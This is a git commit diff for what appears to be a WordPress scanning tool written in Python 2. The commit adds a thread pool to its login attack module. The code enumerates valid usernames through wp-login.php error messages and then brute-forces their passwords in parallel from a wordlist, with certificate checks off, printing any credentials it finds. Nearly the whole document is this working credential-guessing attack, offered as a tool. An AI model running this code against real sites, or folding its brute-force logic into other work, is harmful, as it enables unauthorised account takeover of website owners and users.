Add threading Engine for bruteforce
Soka
parent
ec588f7f4d
commit
d52090579d
|
|
@ -5,10 +5,11 @@ import re
|
|||
import json
|
||||
import os
|
||||
import urllib
|
||||
import sys
|
||||
|
||||
from core import *
|
||||
from wordpress import *
|
||||
from multiprocessing import Process, Pool
|
||||
from thread_engine import ThreadEngine
|
||||
|
||||
class Brute_Engine:
|
||||
def __init__(self, wordpress, brute):
|
||||
|
|
@ -42,14 +43,27 @@ class Brute_Engine:
|
|||
|
||||
with open('fuzz/wordlist.lst') as data_file:
|
||||
data = data_file.readlines()
|
||||
thread_engine = ThreadEngine(wordpress.max_threads)
|
||||
users_found = []
|
||||
|
||||
for user in data:
|
||||
user = user.strip()
|
||||
data = {"log":user, "pwd":"wordpresscan"}
|
||||
if not "Invalid username" in requests.post(wordpress.url + "wp-login.php", data=data, verify=False).text:
|
||||
print info("User found "+ user)
|
||||
thread_engine.new_task(self.check_user, (user, users_found, wordpress))
|
||||
thread_engine.wait()
|
||||
|
||||
for user in users_found:
|
||||
self.bruteforcing_pass(wordpress, user)
|
||||
|
||||
|
||||
def check_user(self, user, users_found, wordpress):
|
||||
data = {"log":user, "pwd":"wordpresscan"}
|
||||
html = requests.post(wordpress.url + "wp-login.php", data=data, verify=False).text
|
||||
# valid login -> the submited user is printed by WP
|
||||
if '<div id="login_error">' in html and '<strong>%s</strong>' % user in html:
|
||||
print info("User found "+ user)
|
||||
users_found.append(user)
|
||||
|
||||
|
||||
"""
|
||||
name : bruteforcing_pass(self, wordpress)
|
||||
description :
|
||||
|
|
@ -60,14 +74,22 @@ class Brute_Engine:
|
|||
with open('fuzz/wordlist.lst') as data_file:
|
||||
data = data_file.readlines()
|
||||
size = len(data)
|
||||
thread_engine = ThreadEngine(wordpress.max_threads)
|
||||
found = [False]
|
||||
|
||||
for index, pwd in enumerate(data):
|
||||
if found[0]: break
|
||||
pwd = pwd.strip()
|
||||
data = {"log": user, "pwd": pwd}
|
||||
percent = int(float(index)/(size)*100)
|
||||
thread_engine.new_task(self.check_pass, (user, pwd, wordpress, found))
|
||||
|
||||
print 'Bruteforcing - {}{}\r'.format( percent*"▓", (100-percent)*'░' ) ,
|
||||
# print 'Bruteforcing - {}{}\r'.format( percent*"▓", (100-percent)*'░' )
|
||||
thread_engine.wait()
|
||||
|
||||
if not "The password you entered" in requests.post(wordpress.url + "wp-login.php", data=data, verify=False).text:
|
||||
|
||||
def check_pass(self, user, pwd, wordpress, found):
|
||||
data = {"log": user, "pwd": pwd}
|
||||
html = requests.post(wordpress.url + "wp-login.php", data=data, verify=False).text
|
||||
if not '<div id="login_error">' in html:
|
||||
print warning("Password found for {} : {}{}".format(user,pwd, ' '*100))
|
||||
break
|
||||
found[0] = True
|
||||
|
|
|
|||
|
|
@ -0,0 +1,51 @@
|
|||
#!/usr/bin/python
|
||||
# -*- coding: utf-8 -*-
|
||||
from threading import Thread
|
||||
# from time import sleep
|
||||
from core import critical, info
|
||||
|
||||
|
||||
class ThreadEngine(object):
|
||||
def __init__(self, max_threads):
|
||||
if max_threads < 1:
|
||||
print critical('Threads number must be > 0')
|
||||
exit()
|
||||
self.max_threads = max_threads
|
||||
self.threads = []
|
||||
print info('Start %d threads ...' % self.max_threads)
|
||||
|
||||
def new_task(self, task, args):
|
||||
""" Try to launch the new task,
|
||||
try again if thread limit exception raised
|
||||
"""
|
||||
while True:
|
||||
try:
|
||||
self.launch_task(task, args)
|
||||
except ThreadLimitError:
|
||||
# sleep(0.1)
|
||||
continue
|
||||
break
|
||||
|
||||
def launch_task(self, task, args):
|
||||
""" Lanch task in a new thread """
|
||||
self.clean_threads()
|
||||
if len(self.threads) < self.max_threads:
|
||||
t = Thread(target=task, args=args)
|
||||
self.threads.append(t)
|
||||
t.start()
|
||||
else:
|
||||
raise ThreadLimitError("Reached threads limit")
|
||||
|
||||
def clean_threads(self):
|
||||
""" Remove ended threads """
|
||||
for thread in self.threads:
|
||||
if not thread.isAlive():
|
||||
self.threads.remove(thread)
|
||||
|
||||
def wait(self):
|
||||
""" Wait for threads end """
|
||||
for thread in self.threads:
|
||||
thread.join()
|
||||
|
||||
class ThreadLimitError(Exception):
|
||||
pass
|
||||
|
|
@ -15,10 +15,11 @@ class Wordpress:
|
|||
agent = False
|
||||
users = {}
|
||||
|
||||
def __init__(self, url, user_agent, nocheck):
|
||||
def __init__(self, url, user_agent, nocheck, max_threads):
|
||||
print info("URL: %s" % url)
|
||||
self.url = url
|
||||
self.agent = user_agent
|
||||
self.max_threads = int(max_threads)
|
||||
self.random_agent()
|
||||
self.clean_url()
|
||||
self.is_up_and_installed()
|
||||
|
|
|
|||
3
main.py
3
main.py
|
|
@ -32,6 +32,7 @@ if __name__ == "__main__":
|
|||
parser.add_argument('--brute', action ='store', dest='brute', default=None, help="Bruteforce users and passwords")
|
||||
parser.add_argument('--nocheck', action ='store_const', const='nocheck',dest='nocheck', default=False, help="Check for a Wordpress instance")
|
||||
parser.add_argument('--random-agent', action ='store_const', const='random_agent', dest='random_agent', default=False, help="Random User-Agent")
|
||||
parser.add_argument('--threads', action ='store', dest='max_threads', default=1, help="Number of threads to use")
|
||||
results = parser.parse_args()
|
||||
|
||||
# Check wordpress url
|
||||
|
|
@ -45,7 +46,7 @@ if __name__ == "__main__":
|
|||
database_update()
|
||||
|
||||
# Build a new wordpress object
|
||||
wp = Wordpress(format_url(results.url), results.random_agent, results.nocheck)
|
||||
wp = Wordpress(format_url(results.url), results.random_agent, results.nocheck, results.max_threads)
|
||||
|
||||
# Launch bruteforce
|
||||
Brute_Engine(wp, results.brute)
|
||||
|
|
|
|||
Loading…
Reference in New Issue